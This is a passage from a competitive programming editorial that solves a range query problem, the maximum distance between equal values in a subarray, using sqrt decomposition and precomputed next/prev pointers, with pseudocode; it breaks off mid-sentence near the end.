The connection of DHT11 with the ESP8266 board is very easy. Originally, the DHT sensor consists of four pins. Where the first pin is the VCC pin, the second is the data pin which has to be connected with an additional 10k ohm resistor, the third is the un-used pin, and the fourth pin is the ground pin. However, on the DHT modules, only three pins are exposed to the pinout of the module and10k ohm pull-up resistor is internally connected to pin 2. We will be using the module in our project.
Connect the ground and the VCC of the DHT11 sensor module to the ground and 3.3V pin of ESP8266. Then connect the data pin of the DHT11 sensor module to any appropriate output pin of the board. We have used GPIO12 (D6) in this case.
Follow the schematic diagram below for the ESP8266 module and connect them accordingly.
Vin is connected with a 3.3V pin on the module and both the ESP board and the sensor module is commonly grounded.
Arduino IoT Cloud
Arduino IoT cloud is a free application where the user can build software to control microcontrollers such as Raspberry Pi, Arduino, and ESP8266 NodeMCU, etc. It allows the users to create connected circuits using microcontrollers which can be easily monitored through an engaging user interface. Real-time data exchange is done easily and securely. For the user, it becomes extremely interactive and easy to use this application to build IoT projects from anywhere over the internet. Only the Arduino IoT cloud application and a steady internet connection in your device (smartphone, laptop, tablet, etc.) are a requirement. No need to install additional libraries.
Getting Started with Arduino IoT Cloud
Working in the Arduino IoT cloud is very simple and easy. Thus, follow the steps given below to successfully build your very first project.
Firstly, type in your browser search tab and press enter. This will open the following homepage of Arduino IOT Cloud. Although this application is free to use but you will have to create an Arduino account. Click Sign in.
If you already have an Arduino account enter the username and password. Otherwise, create a new account to proceed further.
After you have successfully signed in, you will be redirected to the main page. Now click the dotted box as highlighted below
Select ‘IoT Cloud.’
Arduino IoT Cloud Creating Thing
A new window will open up. Now we will have to create a ‘thing.’ This will define the device, Wi-Fi network and will generate variables accordingly which we will be able to control. Click on ‘Create Thing.’
This will open a new screen which will be our Thing overview. As you can see, we will set the title of our project, variables, device and network settings.
Adding Variables
Our project involves three variables one for the LED output, one for temperature and another for humidity. We will create each variable individually. First, we will create the variable for the LED output. Go to the variables section and click ‘Add variable.’ The following section will open up. Add details for the LED output variable like name, variable type, variable permission and variable update policy.
We specified the variable details as follow:
- Name: LED_output (You can use any other name of your choice)
- Variable type: Light
- Variable Permission: read and write (as LED will be configured as an output that we have to read/write data)
- Var Update Policy: On change (we want the variable to update whenever a change is detected)
After specifying all the details, click ‘Add variable.’ In the Thing overview, this new variable will get generated.
Now we will create two more variables one for humidity and another for temperature. Below you can view the details which we have specified for these two variables. Notice that both of these are sensor readings thus variable permission will be checked as read-only.
You can view all the three variables in the Thing overview as shown below:
This is how you can add variables for your project.
Selecting Device
Now, we will link a device to the Thing. Go to Device > Select Device.
We have two options. Either to select Arduino device or third-party device. As we are using the ESP8266 NodeMCU development board thus, we will select ‘third party device.’
Next, select device type. We will choose ‘ESP8266’ and the model as ‘NodeMCU 1.0’. Then click ‘Continue.’
Then we will be prompted to give a name to our device. You can use any preferred name.
Now, you will receive the credentials which will include the device id and the secret key. Copy and save both of them. We will use them later on. Keep it a secret and do not share it with anyone or your project security will be compromised. After saving the credentials, click ‘Continue.’
Press the ‘Done’ button. Thus, we have successfully set up our ESP8266 development board for the project.
Providing Network credentials
Now, the last step in the Thing overview is to set up a Wi-Fi connection. Go to the Network section and click ‘configure.’
Enter the following details to configure the network. You will have to provide the SSID and the password of your Wi-Fi connection. Additionally, you will also need to specify the secret key which we saved previously. After adding the details, click ‘Save.’
All these three configurations (adding variables, configuring device and network) which we made will automatically get generated in a sketch file. We have completed the process to configure the device. At this point, our Thing window will look like this:
Building Dashboard
Now let us move to the next part where we will build the dashboard. At the top of the window, you will find ‘Dashboard.’ Click it.
The following appears on the screen. Click ‘Build Dashboard.’
Click the pencil icon highlighted below. The ‘ADD’ button will pop up. Click on it.
LED Widget
This will open up a list from which we can choose the widgets we want to add to our dashboard. You can search for your required widget in the search tab or look through the list. Firstly, we will choose a switch.
Click the switch widget and the following appears. Give a name to the switch. In our case we are calling it ‘LED.’ Then link it with a variable by clicking ‘Link Variable.’
This will display the variables which we previously created in the Thing. Click the ‘LED_output’ variable and then click ‘Link Variable’ to proceed further.
Click ‘Done’ to create the widget with the given attributes as shown below:
We have successfully configured the first widget.
Now, we will add more widgets to monitor humidity and temperature.
Humidity & Temperature Widgets
For humidity readings go to Add > Widgets > Percentage and click it.
Then we will give this widget the name ‘Humidity’ and link it with the humidity variable. Click ‘Done’ to finish creating the second widget.
Similarly, we will create a widget to monitor temperature readings. Go to Add > Widgets > Gauge and click it.
Then we will give this widget the name ‘Temperature’ and link it with the temperature variable. You can also define the range but we will keep it as default for now. Click ‘Done’ to finish creating the third widget.
We can add another widget to display the temperature readings in a graph. Go to Add > Widgets > Charts
Then we will give this widget the name ‘Temperature’ and link it with the temperature variable. You can also choose the type of chart (spline/line) but we will keep it as default for now. Click ‘Done’ to finish creating the widget.
We have successfully configured the widgets on the dashboard. The dashboard will look like this with the four widgets which we created:
Arduino IoT Cloud Sketch ESP8266
Now as we have configured our device and dashboard, let us look into the sketch to program our ESP8266 board. Go to Things, select the Thing overview which we created (Untitled) and then go to Sketch. This will open a sketch generated from our Thing which we can modify for our project. The three variables which we created are already defined with the necessary libraries and functions.
We will include additional lines of code inside this sketch to incorporate the logic functionality.
Adding logic for onboard LED
For the Onboard LED functionality, we will add the following lines.
setup()
The onboard LED of ESP8266 is connected to GPIO2. Inside the setup() function we will include the following line to configure GPIO2 as an output pin:
pinMode(2,OUTPUT);
onLEDOutputChange()
In the onLEDOutputChange() function include the following lines. Whenever the state of the LED will be 1 i.e., HIGH the onboard LED will turn OFF otherwise it will turn ON. This will be achieved by calling the digitalWrite() function. We will pass the first parameter as ‘2’ and the second as ‘HIGH’ or ‘LOW’ accordingly.
void onLEDOutputChange() { if (lED_output == 1) { digitalWrite(2,LOW); } else{ digitalWrite(2,HIGH); } }
For ESP8266, the onboard LED works on an opposite logic as compared to ESP32. To turn the onboard LED ON, a low signal is sent, and to turn it OFF, a high signal is sent. This is the opposite in the case of ESP32.
Adding logic for temperature and humidity sensor readings
To access temperature/humidity sensor readings from the DHT11 sensor we will have to include an additional library. One of the greatest features of the Arduino IoT cloud is that most of the libraries are already available and you do not need to import them. For this project, we require the DHT sensor library. To see whether Arduino cloud already has that particular library installed, follow the steps below.
First, click ‘open full editor.’
The following window will open. Choose your device from the drop down list. We have set it to NodeMCU 1.0
Go to Libraries > Library Manager. Type DHT sensor library. You will see that it is already available for all the sketches created in the Arduino cloud. Thus, we do not need to import it.
Now, we will carry on modifying our sketch. Include the following lines of code for the proper functionality of the sensor.
Including Library
First, we will include the DHT sensor library as we want to access sensor readings from DHT11 connected with our ESP8266 board.
#include "DHT.h"
Defining DHT Sensor
The following lines of code will specify the type of DHT sensor and the GPIO pin of the ESP8266 board which we will connect with the data pin of the sensor. In this project, we are using the DHT11 sensor and connecting its data pin with GPIO12 of the ESP8266 module. You can use any appropriate pin.
#define DHTPIN 12 #define DHTTYPE DHT11 DHT dht(DHTPIN, DHTTYPE);
setup()
Inside the setup() function, we will initiate the connection with the DHT sensor by calling the begin() function on the dht object.
dht.begin(); also want to update the sensor variables temperature and humidity which we created in Things so that our dashboard displays updated sensor data. We will save the individual sensor readings accessed from the sensor temp and hum into temperature and humidity respectively.
humidity = hum; temperature = temp;
Additionally, we will display these temperature and humidity readings on the serial monitor. Newer readings will continuously appear on the serial monitor as well as on the dashboard after a delay of 1 second.
Serial.print("Temperature: "); Serial.print(temp); Serial.print("°C"); Serial.print(" Humidity: "); Serial.print(hum); Serial.print("%"); Serial.println(); delay(1000);
We have successfully added the additional lines of code to incorporate the led and sensor readings functionality. You can take a look at the completed sketch below:
Sketch generated by the Arduino IoT Cloud Thing "Untitled" Arduino IoT Cloud Variables description The following variables are automatically generated and updated when changes are made to the Thing CloudLight lED_output; CloudTemperatureSensor temperature; CloudRelativeHumidity humidity; Variables which are marked as READ/WRITE in the Cloud Thing will also have functions which are called when their values are changed from the Dashboard. These functions are generated with the Thing and added at the end of this sketch. */ #include "thingProperties.h" #include "DHT.h" #define DHTPIN 12 #define DHTTYPE DHT11 DHT dht(DHTPIN, DHTTYPE); void setup() { // Initialize serial and wait for port to open: Serial.begin(9600); dht.begin(); pinMode(2,OUTPUT); //(); // Your code here float hum = dht.readHumidity(); float temp = dht.readTemperature(); if (isnan(hum) || isnan(temp) ){ Serial.println(F("Failed to read from DHT sensor!")); return; } humidity = hum; temperature = temp; Serial.print("Temperature: "); Serial.print(temp); Serial.print("°C"); Serial.print(" Humidity: "); Serial.print(hum); Serial.print("%"); Serial.println(); delay(1000); } void onLEDOutputChange() { if (lED_output == 1) { digitalWrite(2,LOW); } else{ digitalWrite(2,HIGH); } }
Compiling sketch
To compile the sketch, click ‘open full editor.’ Click the tick icon. This will verify and save the sketch inside the Arduino IoT cloud.
It will take a few moments to check for errors/problems with the sketch. You will receive a success message indicating that your sketch was saved.
Uploading Sketch to ESP8266 board
After we have verified and saved our sketch now is the time to upload it to our ESP board. First, click ‘GO TO IOT CLOUD.’
Open Sketch and you will see a message below indicating that you need to install Create Agent to upload the code. Click ‘Learn More.’
Click ‘download’ and install Arduino Create Agent.
Or you can go to this link and download Arduino Create Agent. After that follow the instructions given on that link to install Arduino create agent.
Uploading code to ESP8266 from Arduino Browser
You can upload code to ESP8266 directly from the Arduino IoT cloud online. But make sure to install Arduino create an agent.
After installing the agent, click on the open full editor button.
After that, the following window will appear. Select the board and click on the upload button to upload code to ESP8266 as follows:
Now go back to the Arduino IoT cloud dashboard which we created earlier. You will see that the values of the sensor will be updated after every 1 second and also you will be able to toggle the LED from the switch.
You may also like to read:
- ESP32/ESP8266 Thermostat Web Server – Control Output Based on Temperature Threshold
- Plot Sensor Readings in Real Time Charts with ESP32 and ESP8266 Web Server
- BME280 with ESP8266 NodeMCU – Display Values on OLED ( Arduino IDE)
- ESP8266 NodeMCU Send Sensor Readings to ThingSpeak using Arduino IDE (BME280)
- ESP32/ESP8266: Publish Sensor Readings to Google Sheets via IFTTT
- ESP32/ESP8266 Control Outputs with Web Server and Push Button Simultaneously
|
https://microcontrollerslab.com/arduino-iot-cloud-esp8266-send-sensor-readings-and-control-outputs/
|
CC-MAIN-2022-33
|
refinedweb
| 2,841
| 64.91
|
Java timezone - strange behavior with IST?
java.util.timezone java 8
java timezone offset list
java gmt timezone
java convert date from one timezone to another
groovy timezone list
android timezone list
timezone australia java
I have the below code:
DateFormat df = new SimpleDateFormat("M/d/yy h:mm a z"); df.setLenient(false); System.out.println(df.parse("6/29/2012 5:15 PM IST"));
Assuming I now set my PC's timezone to Pacific Time (UTC-7 for PDT), this prints
Fri Jun 29 08:15:00 PDT 2012
Isn't PDT 12.5 hours behind IST (Indian Standard Time)? This problem does not occur for any other timezone - I tried UTC, PKT, MMT etc instead of IST in the date string. Are there two ISTs in Java by any chance?
P.S: The date string in the actual code comes from an external source, so I cannot use GMT offset or any other timezone format.
Sorry, I have to write an answer for this, but try this code:
public class Test { public static void main(String[] args) throws ParseException { DF df = new DF("M/d/yy h:mm a z"); String [][] zs = df.getDateFormatSymbols().getZoneStrings(); for( String [] z : zs ) { System.out.println( Arrays.toString( z ) ); } } private static class DF extends SimpleDateFormat { @Override public DateFormatSymbols getDateFormatSymbols() { return super.getDateFormatSymbols(); } public DF(String pattern) { super(pattern); } } }
You'll find that IST appears several times in the list and the first one is indeed Israel Standard Time.
java - SimpleDateFormat is not giving right time?, Help me understand the behavior. getTimeZone("IST")); //Local time zone SimpleDateFormat dateFormatLocal = new SimpleDateFormat("yyyy-MMM-dd Timezone weirdness in java 1.5 806557 May 7, 2005 8:40 PM I'm seeing some strange behavior when dealing with timezones in a webstart app.
The abberviated names of timezone are ambiguous and have been deprecated for Olson names for timezones. The following works consistently as there may be be differences in the way parse() and getTimezone() behaves.
SimpleDateFormat sdf = new SimpleDateFormat("M/d/yy h:mm a Z"); TimeZone istTimeZone = TimeZone.getTimeZone("Asia/Kolkata"); Date d = new Date(); sdf.setTimeZone(istTimeZone); String strtime = sdf.format(d);
Men's Health, PAGE134 WEALTH 1) Try a beer run Commit yourself and your. 116 JANUARY FEBRUARY 2008 132 JANUARY/FEBRUARY 2008 Disagree with this list? Java API - strange behavior on first time index creation. Elasticsearch. Slava_G (Slava G ) 2011-05-30 22:12:14 UTC #1. Hi, Tried to create index on clean
Not an answer but see the output + code below - it does seem that
parse treats IST differently from
TimeZone.getTimeZone("IST")...
Fri Jun 29 16:15:00 BST 2012 Fri Jun 29 12:45:00 BST 2012 Fri Jun 29 12:45:00 BST 2012 *BST = London
public static void main(String[] args) throws InterruptedException, ParseException { DateFormat fmt1 = new SimpleDateFormat("M/d/yy h:mm a Z"); Date date = fmt1.parse("6/29/2012 5:15 PM IST"); System.out.println(date); DateFormat fmt2 = new SimpleDateFormat("M/d/yy h:mm a"); fmt2.setTimeZone(TimeZone.getTimeZone("IST")); System.out.println(fmt2.parse("6/29/2012 5:15 PM")); DateFormat fmt3 = new SimpleDateFormat("M/d/yy h:mm a"); fmt3.setTimeZone(TimeZone.getTimeZone("Asia/Kolkata")); System.out.println(fmt3.parse("6/29/2012 5:15 PM")); }
Working with Time Zones, A list of current W3C publications and the latest revision of this use half-hour or even quarter-hour offsets (or even some odd offsets). Adoption Dates Regions that currently have the same UTC offset and DST behavior may have had As mentioned above, many incremental time values (such as Java's Hi, I just upgraded OH to Beta3 and it has some strange behavior. -OH2 running on a Raspberry Pi OS configured with correct local time (For example 16:00) (UTC+2) -My NTP thing is correctly configured (I also tried with different configurations such Europe/Berlin) hostname: 0.pool.ntp.org Timezone: Europe/Madrid Locale: es_ES -The time I get on my Sitemaps is -2h (14:00) which corresponds to
It is because of IST will have multiple meanings like Irish Standard Time, Isreal Standrad Time, Indian Standard Time.
Ref:
Use setTimezone() method specifically to set the timezone.
Ex: parser.setTimeZone(TimeZone.getTimeZone("specify timezone in detail here"));
Java's java.util.TimeZone, Java Time Zone is messed up stackoverflow.com. I am running a Tomcat Funny thing is that this ID doesn't appear in a list provided by TimeZone.getAvailableIDs(). Strange behavior, with timezone maybe? coderanch.com. How can the Giving time zone explicitly frees us from relying on the default time zone of the JVM. If I understand your question correctly, the JVM time zone setting didn’t reflect the time zone setting of your device. It’s possible for the two to be different, but how that came to be in your case, I cannot tell. Possible explanations include:
TimeZone 1 « TimeZone « Java Data Type Q&A, Java Native Interface 3.2.1 Time Zone Display Name Types; 3.2.2 Time Zone Pattern Usage Relative time styles are not currently supported, and behave just like the If you need a more unusual pattern, construct a SimpleDateFormat directly and give it an example: if Monday is 1st day, Tuesday is 2nd ), e or ee eee But when I attempt to insert data from a Java application (using JPA/EclipseLink), the time is rounded to the nearest full second (losing the fractional component). If I disable the trigger, the time is inserted correctly, except in the local time zone. I know that I can work around the issue by performing the translation to GMT in my Java app.
Formatting Dates and Times, NET and Java APIs for file formats – natively work with DOCX, XLSX, PPT, PDF, images and more Web apps typically require that dates are stored in time zone agnostic fashion. which drops down a list retrieved with TimeZoneInfo. Funny timing - I have been globalizing a Vacation tracking system for Hi there, I encountered a strange scenario last Friday, January the 8th. Here is my code : //Last friday DateTime dateFrom = new DateTime().withYear(2016).withDayOfMonth(8).withMonthOfYear(1); //Get number of week and year int prevWeek =
Back to Basics: UTC and TimeZones in .NET Web Apps, Learn about the time zone specifics of Azure SQL Database NET · Node.js · Java · Go for a new instance, select a time zone from the list of supported time zones. Analyze the application behavior and the results of the queries and Because of certain rare use cases keeping the same.
- There are several ISTs as far as I know. Judging by the time difference (9 hours), you've probably got Israel Standard Time.
- @biziclop I thought about this. But what veered me away from that was the below:
System.out.println(TimeZone.getTimeZone("IST").getRawOffset());This prints 19800000, or 5.5 hours, which suggests that it is indeed Indian Standard Time. Or is it picking up the first of many timezones with the same ID "IST"? If so, how can something be an "ID" if it is the same for many things?
- @esej It's more likely to be an ambiguity in the timezone abbreviations: en.wikipedia.org/wiki/List_of_time_zone_abbreviations
- Looking at the source code it seems that IST is India...
- @Vasan it's not really an ID and
SimpleDateFormatis a strange beast, it's very likely that it isn't using
TimeZone.getTimeZone()at all.
- Thank you, that is quite helpful. I suppose then that I'd have to do something weird like stripping the timezone from the date string before parsing it. The timezone part I can then pass to TimeZone.getTimeZone() to get the actual timezone (I suppose even that isn't guaranteed to work always!). It is all getting patchy now, damn you DateFormat!
- @Vasan Well, DateFormat isn't the only culprit here, the basic problem is that the time zone acronyms aren't unique. In hindsight that was a daft idea. :)
- Yes, it's exactly what I said.
SimpleDateFormatis a strange beast and doesn't play by the rules. It has its own time zone data array and uses whatever comes first in it.
|
http://thetopsites.net/article/52740322.shtml
|
CC-MAIN-2020-50
|
refinedweb
| 1,364
| 55.44
|
/mingw/mingw-get/src
In directory vz-cvs-4.sog:/tmp/cvs-serv15698/src
Modified Files:
pkginet.cpp
Log Message:
Provisional handling for http proxy authentication.
Index: pkginet.cpp
===================================================================
RCS file: /cvsroot/mingw/mingw-get/src/pkginet.cpp,v
retrieving revision 1.8
retrieving revision 1.9
diff -C2 -d -r1.8 -r1.9
*** pkginet.cpp 30 Mar 2010 20:29:26 -0000 1.8
--- pkginet.cpp 30 Mar 2011 20:44:38 -0000 1.9
***************
*** 27,30 ****
--- 27,43 ----
#define WIN32_LEAN_AND_MEAN
+ #define _WIN32_WINNT 0x0500 /* for GetConsoleWindow() kludge */
+ #include <windows.h>
+ /*
+ * FIXME: This kludge allows us to use the standard wininet dialogue
+ * to acquire proxy authentication credentials from the user; this is
+ * expedient for now, (if somewhat anti-social for a CLI application).
+ * We will ultimately need to provide a more robust implementation,
+ * (within the scope of the diagnostic message handler), in order to
+ * obtain a suitable window handle for use when called from the GUI
+ * implementation of mingw-get, (when it becomes available).
+ */
+ #define dmh_dialogue_context() GetConsoleWindow()
+
#include <unistd.h>
#include <stdlib.h>
***************
*** 77,85 ****
* connection to have been established...
*/
! if( (SessionHandle == NULL)
! && (InternetAttemptConnect( 0 ) == ERROR_SUCCESS) )
/*
* ...so, on first call, we perform the connection setup
! * which we deferred from the class constructor.
*/
SessionHandle = InternetOpen
--- 90,100 ----
* connection to have been established...
*/
! if( (SessionHandle == NULL)
! && (InternetAttemptConnect( 0 ) == ERROR_SUCCESS) )
/*
* ...so, on first call, we perform the connection setup
! * which we deferred from the class constructor; (MSDN
! * cautions that this MUST NOT be done in the constructor
! * for any global class object such as ours).
*/
SessionHandle = InternetOpen
***************
*** 87,100 ****
NULL, NULL, 0
);
! return InternetOpenUrl( SessionHandle, URL, NULL, 0, 0, 0 );
}
! inline DWORD QueryStatus( HINTERNET id )
{
! DWORD ok, idx = 0, len = sizeof( ok );
! if( HttpQueryInfo( id, HTTP_QUERY_FLAG_NUMBER | HTTP_QUERY_STATUS_CODE, &ok, &len, &idx ) )
! return ok;
return 0;
}
! inline int Read( HINTERNET dl, char *buf, size_t max, DWORD *count )
{
return InternetReadFile( dl, buf, max, count );
--- 102,190 ----
NULL, NULL, 0
);
! HINTERNET ResourceHandle = InternetOpenUrl
! (
! /* Here, we attempt to assign a URL specific resource handle,
! * within the scope of the SessionHandle obtained above, to
! * manage the connection for the requested URL.
! *
! * Note: Scott Michel suggests INTERNET_FLAG_EXISTING_CONNECT
! * here; MSDN tells us it is useful only for FTP connections.
! * Since we are primarily interested in HTTP connections, it
! * may not help us. However, it does no harm, and MSDN isn't
! * always the reliable source of information we might like.
! * Persistent HTTP connections aren't entirely unknown, (and
! * indeed, MSDN itself tells us we need to use one, when we
! * negotiate proxy authentication); thus, we may just as well
! * specify it anyway, on the off-chance that it may introduce
! * an undocumented benefit beyond wishful thinking.
! */
! SessionHandle, URL, NULL, 0, INTERNET_FLAG_EXISTING_CONNECT, 0
! );
! if( ResourceHandle != NULL )
! {
! /* We got a handle for the URL resource, but we cannot yet be
! * sure that it is ready for use; we may still need to handle
! * proxy or server authentication. Thus, we must capture any
! * error code which may have been returned, BEFORE we move on
! * to evaluate the resource status, (since the procedure for
! * checking status may change the error code).
! */
! unsigned long ResourceStatus = GetLastError();
! if( QueryStatus( ResourceHandle ) == HTTP_STATUS_PROXY_AUTH_REQ )
! {
! /* We've identified a requirement for proxy authentication;
! * here we simply hand the task off to the Microsoft handler,
! * to solicit the appropriate response from the user.
! *
! * FIXME: this may be a reasonable approach when running in
! * a GUI context, but is rather inelegant in the CLI context.
! * Furthermore, this particular implementation provides only
! * for proxy authentication, ignoring the possibility that
! * server authentication may be required. We may wish to
! * revisit this later.
! */
! unsigned long user_response;
! do { user_response = InternetErrorDlg
! ( dmh_dialogue_context(), ResourceHandle, ResourceStatus,
! FLAGS_ERROR_UI_FILTER_FOR_ERRORS |
! FLAGS_ERROR_UI_FLAGS_CHANGE_OPTIONS |
! FLAGS_ERROR_UI_FLAGS_GENERATE_DATA,
! NULL
! );
! /* Having obtained authentication credentials from
! * the user, we may retry the open URL request...
! */
! if( (user_response == ERROR_INTERNET_FORCE_RETRY)
! && HttpSendRequest( ResourceHandle, NULL, 0, 0, 0 ) )
! {
! /* ...and, if successful...
! */
! ResourceStatus = GetLastError();
! if( QueryStatus( ResourceHandle ) == HTTP_STATUS_OK )
! /*
! * ...ensure that the response is anything but 'retry',
! * so that we will break out of the retry loop...
! */
! user_response ^= -1L;
! }
! /* ...otherwise, we keep retrying when appropriate.
! */
! } while( user_response == ERROR_INTERNET_FORCE_RETRY );
! }
! }
! /* Ultimately, we return the resource handle for the opened URL,
! * or NULL if the open request failed.
! */
! return ResourceHandle;
}
! inline unsigned long QueryStatus( HINTERNET id )
{
! unsigned long ok, idx = 0, len = sizeof( ok );
! if( HttpQueryInfo( id, HTTP_QUERY_FLAG_NUMBER | HTTP_QUERY_STATUS_CODE,
! &ok, &len, &idx )
! ) return ok;
return 0;
}
! inline int Read( HINTERNET dl, char *buf, size_t max, unsigned long *count )
{
return InternetReadFile( dl, buf, max, count );
Update of /cvsroot/mingw/mingw-get
In directory vz-cvs-4.sog:/tmp/cvs-serv11464
Modified Files:
ChangeLog
Log Message:
Expand macros in path names for files and directories to be removed.
Index: ChangeLog
===================================================================
RCS file: /cvsroot/mingw/mingw-get/ChangeLog,v
retrieving revision 1.86
retrieving revision 1.87
diff -C2 -d -r1.86 -r1.87
*** ChangeLog 29 Mar 2011 20:04:12 -0000 1.86
--- ChangeLog 30 Mar 2011 20:17:48 -0000 1.87
***************
*** 1,2 ****
--- 1,10 ----
+ 2011-03-30 Keith Marshall <keithmarshall@...>
+
+@...>
I agree to receive quotes, newsletters and other information from sourceforge.net and its partners regarding IT services and products. I understand that I can withdraw my consent at any time. Please refer to our Privacy Policy or Contact Us for more details
|
https://sourceforge.net/p/mingw/mailman/mingw-cvs/?viewmonth=201103&viewday=30
|
CC-MAIN-2016-40
|
refinedweb
| 854
| 55.1
|
PROBLEM LINK:
Author: Fedor Korobeinikov
Tester: Hiroto Sekido
Editorialist: Kevin Atienza
DIFFICULTY:
MEDIUM
PREREQUISITES:
sqrt decomposition, preprocessing
PROBLEM:
Given a sequence of N integers A_1, A_2, \ldots, A_N, where each A_i is between 1 to M, you are to answer Q queries of the following kind:
- Given L and R, where 1 \le L \le R \le N, what is the maximum |x - y| such that L \le x, y \le R and A_x = A_y?
Note that in the problem, Q is actually K.
QUICK EXPLANATION:
For each i, 1 \le i \le N, precompute the following in O(N) time:
- \text{next}[i], the smallest j > i such that A_i = A_j
- \text{prev}[i], the largest j < i such that A_i = A_j
Let S = \lfloor \sqrt{N} \rfloor, and B = \lceil N/S \rceil. Decompose the array into B blocks, each of size S (except possibly the last). For each i, 1 \le i \le N, and 0 \le j \le B-1, precompute the following in O(N \sqrt{N}) time:
- \text{last_in_blocks}[j][i], the largest k \le jS+S such that A_k = A_i
- \text{block_ans}[j][i], the answer for the query (L,R) = (jS+1,i). For a fixed j, all the \text{block_ans}[j][i] can be computed in O(N) time.
Now, to answer a query (L,R), first find the blocks j_L and j_R where L and R belong in (0 \le j_L, j_R < B). Then the answer is at least \text{block_ans}[j_L+1][R], and the only pairs (x,y) not yet considered are those where L \le x \le j_LS+S. To consider those, one can simply try all x in that range, and find the highest y \le R such that A_x = A_y. Finding that y can be done by using \text{last_in_blocks}[j_R-1][x] and a series of \text{next} calls. To make that last part run in O(S) time, consider only the x such that \text{prev}[x] < L.
EXPLANATION:
We’ll explain the solution for subtask 1 first, because our solution for subtask 2 will build upon it. However, we will first make the assumption that M \le N, otherwise we can simply replace the values A_1, \ldots A_N with numbers from 1 to N, and should only take O(N) time with a set. However, we don’t recommended that you actually do it; this is only to make the analysis clearer.
O(N^2) per query
First, a simple brute-force O(N^2)-time per query is very simple to implement, so getting the first subtask is not an issue at all. I’m even providing you with a pseudocode on how to do it
def answer_query(L, R): for d in R-L...1 by -1 for x in L...R-d y = x+d if A[x] == A[y] return d return 0
We’re simply checking every possible answer from [0,R-L] in decreasing order. Note that the whole algorithm runs in O(QN^2) time, which could get TLE if the test cases were stronger. But in case you can’t get your solution accepted, then it’s time to optimize your query time to…
O(N) per query
To obtain a faster running time, we have to use the fact that we are finding the maximum |x-y|. What this means is that for every value v, we are only concerned with the first and last time it occurs in [L,R].
We first consider the following alternative O(N^2)-time per query solution:
def answer_query(L, R): answer = 0 for y in L...R for x in L...y if A[x] == A[y] answer = max(answer, y - x) return answer
The idea here is that for every y, we are seeking A_x, which is the first occurrence of A_y in [L,y], because all the other occurrences will result in a smaller y - x value. Now, to speed it up, notice that we don’t have to recompute this x every time we encounter the value A_x, because we are already reading the values A_L, \ldots, A_R in order, so we already have the information “when did A_y first appear” before we ever need it! Here’s an implementation (in pseudocode):
def answer_query(L, R): index = new map/dictionary answer = 0 for y in L...R if not index.has_key(A[y]) index[A[y]] = y answer = max(answer, y - index[A[y]]) return answer
Now, notice that this runs in O(N) time if one uses a hash map for example!
We mention here that it’s possible to drop the use of a hash map by using the fact that the values A_y are in [1,M]. This means that we can simply allocate an array of length M, instead of creating a hash map from scratch or clearing it. However, we must be careful when we reinitialize this array, because it is long! There are two ways of “initializing” it:
- We clear the array every time we’re done using it, but we only clear those we just encountered. This required listing all the indices we accessed.
- We maintain a parallel array that contains when array was last accessed for each index. To clear the array, we simply update the current time.
We’ll show how to do the second one:
class LazyMap: index[1..M] found[1..M] # all initialized to zero time = 0 def clear(): this.time++ def has_key(i): return this.found[i] == this.time def set(i, value): # called on the statement x[i] = value for example this.found[i] = this.time this.index[i] = value def get(i): # called on the expression x[i] for example return this.index[i] index = new LazyMap() def answer_query(L, R): index.clear() answer = 0 for y in L...R if not index.has_key(A[y]) index[A[y]] = y answer = max(answer, y - index[A[y]]) return answer
Using this, the algorithm still runs in O(N) time (remember that we assume M \le N), but most likely with a lower constant.
The overall algorithm runs in O(QN) time.
sqrt decomposition
When one encounters an array with queries in it, there are usually two ways to preprocess the array so that the queries can be done in sublinear time:
- sqrt decomposition, which splits up the array into \lceil N/S \rceil blocks of size S each. S is usually taken to be \lfloor \sqrt{N} \rfloor (hence the term “sqrt decomposition”). Usually, one can reduce the running time to O((N+Q)\sqrt{N}) or O((N+Q)\sqrt{N \log N}). Sometimes, depending on the problem, it may also yield O((N + Q)N^{2/3}) time.
- build some tree structure on top of the array. This usually yields an O(N + Q \log N) or O((N + Q) \log N) time algorithm.
There are other less common ways, such as lazy updates or combinations of the above, but first we’ll try out whether the above work.
Suppose we have selected the parameter S, and we have split the array into B = \lceil N/S \rceil blocks of size S, except possibly the last block which may contain fewer than S elements. Suppose we want to answer a particular query (L,R). Note that L and R will belong to some block. For simplicity, we assume that they belong to different blocks, because if they are on the same block, then R - L \le S, so we can use the O(S) time query above.
Thus, the general picture will be:
|...........|...........|...........|...........|...........|...........|...........| ^ ^ ^ ^ L E_L E_R R
We have marked two additional points, E_L and E_R, which are the boundaries of the blocks completely inside [L,R]. Now, it would be nice if we have already precomputed the answer for the query pair (E_L,E_R), because then we will only have to deal with at most 2(S-1) remaining values: [L,E_L) and [E_R,R]. We can indeed precompute the answers at the boundaries, but we can do even better: we can precompute the answers for all pairs (E,R), where E is a boundary point and R is any point in the array! There are only O(BN) pairs, and we can compute the answers in O(BN) time also:
class LazyMap: ... S = floor(sqrt(N)) B = ceil(N/S) index = new LazyMap() block_ans[1..B][1..N] def precompute(): answer = 0 for b in 1...B index.clear() E = b*S-S+1 # left endpoint of the b'th block answer = 0 for R in E...N if not index.has_key(A[R]) index[A[R]] = R answer = max(answer, R - index[A[R]]) block_ans[b][R] = answer
(if you read the “quick explanation”, note that there is a slight difference here: we’re indexing the blocks from 1 to B instead of 0 to B-1)
This means that, in the query, the only remaining values we haven’t considered yet are those in [L,E_L). To consider those, we have to know, for each x in [L,E_L), the last occurrence of A_x in [L,R]. To do so, we will need the following information:
- \text{next}[i], the smallest j > i such that A_i = A_j
- \text{prev}[i], the largest j < i such that A_i = A_j
- \text{last_in_blocks}[j][i], the largest k within the first j blocks such that A_k = A_i
How will this help us? Well, we want to find A_x's last occurrences in [L,R]. So first, we find its last occurrence in the blocks up to E_R (it’s just \text{last_in_blocks}[\text{floor}(R/S)][x]). However, it’s possible that A_x appears in [E_R,R], so we need to use its \text{next} pointers, until we find the last one. Since there are at most S-1 elements in [E_R,R], this seems fast, but it could easily take O(S^2) time for example when most of the values in [L,E_L) and [E_R,R] are equal. Thankfully, this is easily fixed: we only care about the first occurrence of A_x, so if it has been encountered before, then we don’t have to process it again! This ensures that for distinct value in [E_R,R], its set of indices is iterated only once. This therefore guarantees an O(S) running time!
Checking whether an A_x has been encountered before can also be done using the
index approach, or alternatively as \text{prev}[x] \ge L:
def answer_query(L, R): b_L = ((L+S-1)/S) b_R = R/S if b_L >= b_R # old query here else E_L = b_L*S answer = block_ans[b_L+1][R] for x in L...E_L if prev[x] < L # i.e. x hasn't been encountered before y = last_in_blocks[floor(R/S)][x] while next[y] <= R y = next[y] answer = max(answer, y - x) return answer
One can now see that the query time is now O(S)
